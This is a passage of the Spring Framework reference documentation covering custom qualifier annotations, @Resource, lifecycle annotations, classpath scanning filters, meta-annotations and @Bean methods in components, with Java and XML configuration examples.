at the parameter level. By contrast, `@Resource`\nis supported only for fields and bean property setter methods with a single argument.\nAs a consequence, stick with qualifiers if your injection target is a constructor or a\nmulti-argument method.\n====\n\nYou can create your own custom qualifier annotations. Simply define an annotation and\nprovide the `@Qualifier` annotation within your definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t**@Qualifier**\n\tpublic @interface Genre {\n\n\t\tString value();\n\t}\n----\n\nThen you can provide the custom qualifier on autowired fields and parameters:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Genre(\"Action\")**\n\t\tprivate MovieCatalog actionCatalog;\n\t\tprivate MovieCatalog comedyCatalog;\n\n\t\t@Autowired\n\t\tpublic void setComedyCatalog(**@Genre(\"Comedy\")** MovieCatalog comedyCatalog) {\n\t\t\tthis.comedyCatalog = comedyCatalog;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNext, provide the information for the candidate bean definitions. You can add\n`<qualifier\/>` tags as sub-elements of the `<bean\/>` tag and then specify the `type` and\n`value` to match your custom qualifier annotations. The type is matched against the\nfully-qualified class name of the annotation. Or, as a convenience if no risk of\nconflicting names exists, you can use the short class name. Both approaches are\ndemonstrated in the following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"Genre\" value=\"Action\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t**<qualifier type=\"example.Genre\" value=\"Comedy\"\/>**\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean id=\"movieRecommender\" class=\"example.MovieRecommender\"\/>\n\n\t<\/beans>\n----\n\nIn <<beans-classpath-scanning>>, you will see an annotation-based alternative to\nproviding the qualifier metadata in XML. Specifically, see <<beans-scanning-qualifiers>>.\n\nIn some cases, it may be sufficient to use an annotation without a value. This may be\nuseful when the annotation serves a more generic purpose and can be applied across\nseveral different types of dependencies. For example, you may provide an __offline__\ncatalog that would be searched when no Internet connection is available. First define\nthe simple annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface Offline {\n\n\t}\n----\n\nThen add the annotation to the field or property to be autowired:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t**@Offline**\n\t\tprivate MovieCatalog offlineCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nNow the bean definition only needs a qualifier `type`:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t**<qualifier type=\"Offline\"\/>**\n\t\t<!-- inject any dependencies required by this bean -->\n\t<\/bean>\n----\n\nYou can also define custom qualifier annotations that accept named attributes in\naddition to or instead of the simple `value` attribute. If multiple attribute values are\nthen specified on a field or parameter to be autowired, a bean definition must match\n__all__ such attribute values to be considered an autowire candidate. As an example,\nconsider the following annotation definition:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.FIELD, ElementType.PARAMETER})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Qualifier\n\tpublic @interface MovieQualifier {\n\n\t\tString genre();\n\n\t\tFormat format();\n\n\t}\n----\n\nIn this case `Format` is an enum:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic enum Format {\n\t\tVHS, DVD, BLURAY\n\t}\n----\n\nThe fields to be autowired are annotated with the custom qualifier and include values\nfor both attributes: `genre` and `format`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Action\")\n\t\tprivate MovieCatalog actionVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.VHS, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyVhsCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.DVD, genre=\"Action\")\n\t\tprivate MovieCatalog actionDvdCatalog;\n\n\t\t@Autowired\n\t\t@MovieQualifier(format=Format.BLURAY, genre=\"Comedy\")\n\t\tprivate MovieCatalog comedyBluRayCatalog;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nFinally, the bean definitions should contain matching qualifier values. This example\nalso demonstrates that bean __meta__ attributes may be used instead of the\n`<qualifier\/>` sub-elements. If available, the `<qualifier\/>` and its attributes take\nprecedence, but the autowiring mechanism falls back on the values provided within the\n`<meta\/>` tags if no such qualifier is present, as in the last two bean definitions in\nthe following example.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:annotation-config\/>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Action\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<qualifier type=\"MovieQualifier\">\n\t\t\t\t<attribute key=\"format\" value=\"VHS\"\/>\n\t\t\t\t<attribute key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<\/qualifier>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"DVD\"\/>\n\t\t\t<meta key=\"genre\" value=\"Action\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t\t<bean class=\"example.SimpleMovieCatalog\">\n\t\t\t<meta key=\"format\" value=\"BLURAY\"\/>\n\t\t\t<meta key=\"genre\" value=\"Comedy\"\/>\n\t\t\t<!-- inject any dependencies required by this bean -->\n\t\t<\/bean>\n\n\t<\/beans>\n----\n\n\n\n[[beans-generics-as-qualifiers]]\n=== Using generics as autowiring qualifiers\n\nIn addition to the `@Qualifier` annotation, it is also possible to use Java generic types\nas an implicit form of qualification. For example, suppose you have the following\nconfiguration:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class MyConfiguration {\n\n\t\t@Bean\n\t\tpublic StringStore stringStore() {\n\t\t\treturn new StringStore();\n\t\t}\n\n\t\t@Bean\n\t\tpublic IntegerStore integerStore() {\n\t\t\treturn new IntegerStore();\n\t\t}\n\n\t}\n----\n\nAssuming that beans above implement a generic interface, i.e. `Store<String>` and\n`Store<Integer>`, you can `@Autowire` the `Store` interface and the __generic__ will\nbe used as a qualifier:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Autowired\n\tprivate Store<String> s1; \/\/ <String> qualifier, injects the stringStore bean\n\n\t@Autowired\n\tprivate Store<Integer> s2; \/\/ <Integer> qualifier, injects the integerStore bean\n----\n\nGeneric qualifiers also apply when autowiring Lists, Maps and Arrays:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ Inject all Store beans as long as they have an <Integer> generic\n\t\/\/ Store<String> beans will not appear in this list\n\t@Autowired\n\tprivate List<Store<Integer>> s;\n----\n\n\n\n\n[[beans-custom-autowire-configurer]]\n=== CustomAutowireConfigurer\n\nThe\n{api-spring-framework}\/beans\/factory\/annotation\/CustomAutowireConfigurer.html[`CustomAutowireConfigurer`]\nis a `BeanFactoryPostProcessor` that enables you to register your own custom qualifier\nannotation types even if they are not annotated with Spring's `@Qualifier` annotation.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"customAutowireConfigurer\"\n\t\t\tclass=\"org.springframework.beans.factory.annotation.CustomAutowireConfigurer\">\n\t\t<property name=\"customQualifierTypes\">\n\t\t\t<set>\n\t\t\t\t<value>example.CustomQualifier<\/value>\n\t\t\t<\/set>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe `AutowireCandidateResolver` determines autowire candidates by:\n\n* the `autowire-candidate` value of each bean definition\n* any `default-autowire-candidates` pattern(s) available on the `<beans\/>` element\n* the presence of `@Qualifier` annotations and any custom annotations registered\nwith the `CustomAutowireConfigurer`\n\nWhen multiple beans qualify as autowire candidates, the determination of a \"primary\" is\nthe following: if exactly one bean definition among the candidates has a `primary`\nattribute set to `true`, it will be selected.\n\n\n\n[[beans-resource-annotation]]\n=== @Resource\n\nSpring also supports injection using the JSR-250 `@Resource` annotation on fields or\nbean property setter methods. This is a common pattern in Java EE 5 and 6, for example\nin JSF 1.2 managed beans or JAX-WS 2.0 endpoints. Spring supports this pattern for\nSpring-managed objects as well.\n\n`@Resource` takes a name attribute, and by default Spring interprets that value as the\nbean name to be injected. In other words, it follows __by-name__ semantics, as\ndemonstrated in this example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource(name=\"myMovieFinder\")**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\nIf no name is specified explicitly, the default name is derived from the field name or\nsetter method. In case of a field, it takes the field name; in case of a setter method,\nit takes the bean property name. So the following example is going to have the bean with\nname \"movieFinder\" injected into its setter method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nThe name provided with the annotation is resolved as a bean name by the\n`ApplicationContext` of which the `CommonAnnotationBeanPostProcessor` is aware. The\nnames can be resolved through JNDI if you configure Spring's\n{api-spring-framework}\/jndi\/support\/SimpleJndiBeanFactory.html[`SimpleJndiBeanFactory`]\nexplicitly. However, it is recommended that you rely on the default behavior and simply\nuse Spring's JNDI lookup capabilities to preserve the level of indirection.\n====\n\nIn the exclusive case of `@Resource` usage with no explicit name specified, and similar\nto `@Autowired`, `@Resource` finds a primary type match instead of a specific named bean\nand resolves well-known resolvable dependencies: the `BeanFactory`,\n`ApplicationContext`, `ResourceLoader`, `ApplicationEventPublisher`, and `MessageSource`\ninterfaces.\n\nThus in the following example, the `customerPreferenceDao` field first looks for a bean\nnamed customerPreferenceDao, then falls back to a primary type match for the type\n`CustomerPreferenceDao`. The \"context\" field is injected based on the known resolvable\ndependency type `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Resource\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Resource\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[beans-postconstruct-and-predestroy-annotations]]\n=== @PostConstruct and @PreDestroy\n\nThe `CommonAnnotationBeanPostProcessor` not only recognizes the `@Resource` annotation\nbut also the JSR-250 __lifecycle__ annotations. Introduced in Spring 2.5, the support\nfor these annotations offers yet another alternative to those described in\n<<beans-factory-lifecycle-initializingbean,initialization callbacks>> and\n<<beans-factory-lifecycle-disposablebean,destruction callbacks>>. Provided that the\n`CommonAnnotationBeanPostProcessor` is registered within the Spring\n`ApplicationContext`, a method carrying one of these annotations is invoked at the same\npoint in the lifecycle as the corresponding Spring lifecycle interface method or\nexplicitly declared callback method. In the example below, the cache will be\npre-populated upon initialization and cleared upon destruction.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class CachingMovieLister {\n\n\t\t@PostConstruct\n\t\tpublic void populateMovieCache() {\n\t\t\t\/\/ populates the movie cache upon initialization...\n\t\t}\n\n\t\t@PreDestroy\n\t\tpublic void clearMovieCache() {\n\t\t\t\/\/ clears the movie cache upon destruction...\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nFor details about the effects of combining various lifecycle mechanisms, see\n<<beans-factory-lifecycle-combined-effects>>.\n====\n\n\n\n\n[[beans-classpath-scanning]]\n== Classpath scanning and managed components\nMost examples in this chapter use XML to specify the configuration metadata that produces\neach `BeanDefinition` within the Spring container. The previous section\n(<<beans-annotation-config>>) demonstrates how to provide a lot of the configuration\nmetadata through source-level annotations. Even in those examples, however, the \"base\"\nbean definitions are explicitly defined in the XML file, while the annotations only drive\nthe dependency injection. This section describes an option for implicitly detecting the\n__candidate components__ by scanning the classpath. Candidate components are classes that\nmatch against a filter criteria and have a corresponding bean definition registered with\nthe container. This removes the need to use XML to perform bean registration; instead you\ncan use annotations (for example `@Component`), AspectJ type expressions, or your own\ncustom filter criteria to select which classes will have bean definitions registered with\nthe container.\n\n[NOTE]\n====\nStarting with Spring 3.0, many features provided by the Spring JavaConfig project are\npart of the core Spring Framework. This allows you to define beans using Java rather\nthan using the traditional XML files. Take a look at the `@Configuration`, `@Bean`,\n`@Import`, and `@DependsOn` annotations for examples of how to use these new features.\n====\n\n\n\n[[beans-stereotype-annotations]]\n=== @Component and further stereotype annotations\n\nThe `@Repository` annotation is a marker for any class that fulfills the role or\n__stereotype__ of a repository (also known as Data Access Object or DAO). Among the uses\nof this marker is the automatic translation of exceptions as described in\n<<orm-exception-translation>>.\n\nSpring provides further stereotype annotations: `@Component`, `@Service`, and\n`@Controller`. `@Component` is a generic stereotype for any Spring-managed component.\n`@Repository`, `@Service`, and `@Controller` are specializations of `@Component` for\nmore specific use cases, for example, in the persistence, service, and presentation\nlayers, respectively. Therefore, you can annotate your component classes with\n`@Component`, but by annotating them with `@Repository`, `@Service`, or `@Controller`\ninstead, your classes are more properly suited for processing by tools or associating\nwith aspects. For example, these stereotype annotations make ideal targets for\npointcuts. It is also possible that `@Repository`, `@Service`, and `@Controller` may\ncarry additional semantics in future releases of the Spring Framework. Thus, if you are\nchoosing between using `@Component` or `@Service` for your service layer, `@Service` is\nclearly the better choice. Similarly, as stated above, `@Repository` is already\nsupported as a marker for automatic exception translation in your persistence layer.\n\n\n\n[[beans-meta-annotations]]\n=== Meta-annotations\n\nMany of the annotations provided by Spring can be used as __meta-annotations__ in your\nown code. A meta-annotation is simply an annotation that can be applied to another\nannotation. For example, the `@Service` annotation mentioned above is meta-annotated with\n`@Component`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t**@Component** \/\/ Spring will see this and treat @Service in the same way as @Component\n\tpublic @interface Service {\n\n\t\t\/\/ ....\n\t}\n----\n\nMeta-annotations can also be combined to create __composed annotations__. For example,\nthe `@RestController` annotation from Spring MVC is __composed__ of `@Controller` and\n`@ResponseBody`.\n\nIn addition, composed annotations may optionally redeclare attributes from\nmeta-annotations to allow user customization. This can be particularly useful when you\nwant to only expose a subset of the meta-annotation's attributes. For example, Spring's\n`@SessionScope` annotation hardcodes the scope name to `session` but still allows\ncustomization of the `proxyMode`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target({ElementType.TYPE, ElementType.METHOD})\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t@Scope(WebApplicationContext.SCOPE_SESSION)\n\tpublic @interface SessionScope {\n\n\t\t\/**\n\t\t * Alias for {@link Scope#proxyMode}.\n\t\t * <p>Defaults to {@link ScopedProxyMode#TARGET_CLASS}.\n\t\t *\/\n\t\t@AliasFor(annotation = Scope.class)\n\t\tScopedProxyMode proxyMode() default ScopedProxyMode.TARGET_CLASS;\n\n\t}\n----\n\n`@SessionScope` can then be used without declaring the `proxyMode` as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\t**@SessionScope**\n\tpublic class SessionScopedService {\n\t\t\/\/ ...\n\t}\n----\n\nOr with an overridden value for the `proxyMode` as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\t**@SessionScope(proxyMode = ScopedProxyMode.INTERFACES)**\n\tpublic class SessionScopedUserService implements UserService {\n\t\t\/\/ ...\n\t}\n----\n\nFor further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.\n\n\n[[beans-scanning-autodetection]]\n=== Automatically detecting classes and registering bean definitions\n\nSpring can automatically detect stereotyped classes and register corresponding\n``BeanDefinition``s with the `ApplicationContext`. For example, the following two classes\nare eligible for such autodetection:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Autowired\n\t\tpublic SimpleMovieLister(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class JpaMovieFinder implements MovieFinder {\n\t\t\/\/ implementation elided for clarity\n\t}\n----\n\nTo autodetect these classes and register the corresponding beans, you need to add\n`@ComponentScan` to your `@Configuration` class, where the `basePackages` attribute\nis a common parent package for the two classes. (Alternatively, you can specify a\ncomma\/semicolon\/space-separated list that includes the parent package of each class.)\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[NOTE]\n====\nfor concision, the above may have used the `value` attribute of the\nannotation, i.e. `@ComponentScan(\"org.example\")`\n====\n\nThe following is an alternative using XML\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:component-scan base-package=\"org.example\"\/>\n\n\t<\/beans>\n----\n\n[TIP]\n====\nThe use of `<context:component-scan>` implicitly enables the functionality of\n`<context:annotation-config>`. There is usually no need to include the\n`<context:annotation-config>` element when using `<context:component-scan>`.\n====\n\n[NOTE]\n====\nThe scanning of classpath packages requires the presence of corresponding directory\nentries in the classpath. When you build JARs with Ant, make sure that you do __not__\nactivate the files-only switch of the JAR task. Also, classpath directories may not\nget exposed based on security policies in some environments, e.g. standalone apps on\nJDK 1.7.0_45 and higher (which requires 'Trusted-Library' setup in your manifests; see\nhttp:\/\/stackoverflow.com\/questions\/19394570\/java-jre-7u45-breaks-classloader-getresources).\n====\n\nFurthermore, the `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` are both included implicitly when you use the\ncomponent-scan element. That means that the two components are autodetected __and__\nwired together - all without any bean configuration metadata provided in XML.\n\n[NOTE]\n====\nYou can disable the registration of `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` by including the __annotation-config__ attribute\nwith a value of false.\n====\n\n\n\n[[beans-scanning-filters]]\n=== Using filters to customize scanning\n\nBy default, classes annotated with `@Component`, `@Repository`, `@Service`,\n`@Controller`, or a custom annotation that itself is annotated with `@Component` are the\nonly detected candidate components. However, you can modify and extend this behavior\nsimply by applying custom filters. Add them as __includeFilters__ or __excludeFilters__\nparameters of the `@ComponentScan` annotation (or as __include-filter__ or __exclude-filter__\nsub-elements of the `component-scan` element). Each filter element requires the `type`\nand `expression` attributes. The following table describes the filtering options.\n\n[[beans-scanning-filters-tbl]]\n.Filter Types\n|===\n| Filter Type| Example Expression| Description\n\n| annotation (default)\n| `org.example.SomeAnnotation`\n| An annotation to be present at the type level in target components.\n\n| assignable\n| `org.example.SomeClass`\n| A class (or interface) that the target components are assignable to (extend\/implement).\n\n| aspectj\n| `org.example..*Service+`\n| An AspectJ type expression to be matched by the target components.\n\n| regex\n| `org\\.example\\.Default.*`\n| A regex expression to be matched by the target components class names.\n\n| custom\n| `org.example.MyTypeFilter`\n| A custom implementation of the `org.springframework.core.type .TypeFilter` interface.\n|===\n\nThe following example shows the configuration ignoring all `@Repository` annotations\nand using \"stub\" repositories instead.\n\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n @ComponentScan(basePackages = \"org.example\",\n \t\tincludeFilters = @Filter(type = FilterType.REGEX, pattern = \".*Stub.*Repository\"),\n \t\texcludeFilters = @Filter(Repository.class))\n public class AppConfig {\n \t...\n }\n----\n\nand the equivalent using XML\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\">\n\t\t\t<context:include-filter type=\"regex\"\n\t\t\t\t\texpression=\".*Stub.*Repository\"\/>\n\t\t\t<context:exclude-filter type=\"annotation\"\n\t\t\t\t\texpression=\"org.springframework.stereotype.Repository\"\/>\n\t\t<\/context:component-scan>\n\t<\/beans>\n----\n\n[NOTE]\n====\nYou can also disable the default filters by setting `useDefaultFilters=false` on the annotation or\nproviding `use-default-filters=\"false\"` as an attribute of the `<component-scan\/>` element. This\nwill in effect disable automatic detection of classes annotated with `@Component`, `@Repository`,\n`@Service`, `@Controller`, or `@Configuration`.\n====\n\n\n\n[[beans-factorybeans-annotations]]\n=== Defining bean metadata within components\n\nSpring components can also contribute bean definition metadata to the container. You do\nthis with the same `@Bean` annotation used to define bean metadata within `@Configuration`\nannotated classes. Here is a simple example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\tpublic void doWork() {\n\t\t\t\/\/ Component method implementation omitted\n\t\t}\n\n\t}\n----\n\nThis class is a Spring component that has application-specific code contained in its\n`doWork()` method. However, it also contributes a bean definition that has a factory\nmethod referring to the method `publicInstance()`. The `@Bean` annotation identifies the\nfactory method and other bean definition properties, such as a qualifier value through\nthe `@Qualifier` annotation. Other method level annotations that can be specified are\n`@Scope`, `@Lazy`, and custom qualifier annotations.\n\n[TIP]\n====\nIn addition to its role for component initialization, the `@Lazy` annotation may also be\nplaced on injection points marked with `@Autowired` or `@Inject`. In this context, it\nleads to the injection of a lazy-resolution proxy.\n====\n\nAutowired fields and methods are supported as previously discussed, with additional\nsupport for autowiring of `@Bean` methods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\tprivate static int i;\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\t\/\/ use of a custom qualifier and autowiring of method parameters\n\t\t@Bean\n\t\tprotected TestBean protectedInstance(\n\t\t\t\t@Qualifier(\"public\") TestBean spouse,\n\t\t\t\t@Value(\"#{privateInstance.age}\") String country) {\n\t\t\tTestBean tb = new TestBean(\"protectedInstance\", 1);\n\t\t\ttb.setSpouse(spouse);\n\t\t\ttb.setCountry(country);\n\t\t\treturn tb;\n\t\t}\n\n\t\t@Bean\n\t\tprivate TestBean privateInstance() {\n\t\t\treturn new TestBean(\"privateInstance\", i++);\n\t\t}\n\n\t\t@Bean\n\t\t@RequestScope\n\t\tpublic TestBean requestScopedInstance() {\n\t\t\treturn new TestBean(\"requestScopedInstance\", 3);\n\t\t}\n\n\t}\n----\n\nThe example autowires the `String` method parameter `country` to the value of the `Age`\nproperty on another bean named `privateInstance`. A Spring Expression Language element\ndefines the value of the property through the notation `#{ <expression> }`. For `@Value`\nannotations, an expression resolver is preconfigured to look for bean names when\nresolving expression text.\n\nAs of Spring Framework 4.3, you may also declare a factory method parameter of type\n`InjectionPoint` (or its more specific subclass `DependencyDescriptor`) in order to\naccess the requesting injection point that triggers the creation of the current bean.\nNote that this will only apply to the actual creation of bean instances, not to the\ninjection of existing instances. As a consequence, this feature makes most sense for\nbeans of prototype scope. For other scopes, the factory method will only ever see the\ninjection point which triggered the creation of a new bean instance in the given scope:\nfor example, the dependency that triggered the creation of a lazy singleton bean.\nUse the provided injection point metadata with semantic care in such scenarios.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\t@Bean @Scope(\"prototype\")\n\t\tpublic TestBean prototypeInstance(InjectionPoint injectionPoint) {\n\t\t\treturn new TestBean(\"prototypeInstance for \" + injectionPoint.getMember());\n\t\t}\n\t}\n----\n\nThe `@Bean` methods in a regular Spring component are processed differently than their\ncounterparts inside a Spring `@Configuration` class. The difference is that `@Component`\nclasses are not enhanced with CGLIB to intercept the invocation of methods and fields.\nCGLIB proxying is the means by which invoking methods or fields within `@Bean` methods\nin `@Configuration` classes creates bean metadata references to collaborating objects;\nsuch methods are __not__ invoked with normal Java semantics but rather go through the\ncontainer in order to provide the usual lifecycle management and proxying of Spring\nbeans even when referring to other beans via programmatic calls to `@Bean` methods.\nIn contrast, invoking a method or field in an `@Bean` method within a plain `@Component`\nclass __has__ standard Java semantics, with no special CGLIB processing or other\nconstraints applying.\n\n[NOTE]\n====\nYou may declare `@Bean` methods as `static`, allowing for them to be called without\ncreating their containing configuration class as an instance. This makes particular\nsense when defining post-processor beans, e.g. of type `BeanFactoryPostProcessor` or\n`BeanPostProcessor`, since such beans will get initialized early in the container\nlifecycle and should avoid triggering other parts of the configuration at that point.\n\nNote that calls to static `@Bean` methods will never get intercepted by the container,\nnot even within `@Configuration` classes (see above). This is due to technical\nlimitations: CGLIB subclassing can only override non-static methods. As a consequence,\na direct call to another `@Bean` method will have standard Java semantics, resulting\nin an independent instance being returned straight from the factory method itself.\n\nThe Java language visibility of `@Bean` methods does not have an immediate impact on\nthe resulting bean definition in Spring's container. You may freely declare your\nfactory methods as you see fit in non-`@Configuration` classes and also for static\nmethods anywhere. However, regular `@Bean` methods in `@Configuration` classes need\nto be overridable, i.e. they must not be declared as `private` or `final`.\n\n`@Bean` methods will also be discovered on base classes of a given component or\nconfiguration class, as well as on Java 8 default methods declared in interfaces\nimplemented by the component or configuration class. This allows for a lot of\nflexibility in composing complex configuration arrangements, with even multiple\ninheritance being possible through Java 8 default methods as of Spring 4.2.\n\nFinally, note that a single class may hold multiple `@Bean` methods for the same\nbean, as an arrangement of multiple factory methods to use depending on available\ndependencies at runtime. This is the same algorithm as for choosing the \"greediest\"\nconstructor or factory method in other configuration scenarios: The variant with\nthe largest number of satisfiable dependencies will be picked at construction time,\nanalogous to how the container selects between multiple `@Autowired` constructors.\n====\n\n\n\n[[beans-scanning-name-generator]]\n=== Naming autodetected components\n\nWhen a component is autodetected as part of the scanning process, its bean name is\ngenerated by the `BeanNameGenerator` strategy known to that scanner. By default, any\nSpring stereotype annotation (`@Component`, `@Repository`, `@Service`, and\n`@Controller`) that contains a _name_ `value` will thereby provide that name to the\ncorresponding bean definition.\n\nIf such an annotation contains no _name_ `value` or for any other detected component (such\nas those discovered by custom filters), the default bean name generator returns the\nuncapitalized non-qualified class name. For example, if the following two components\nwere detected, the names would be `myMovieLister` and `movieFinderImpl`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service(\"myMovieLister\")\n\tpublic class SimpleMovieLister {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ 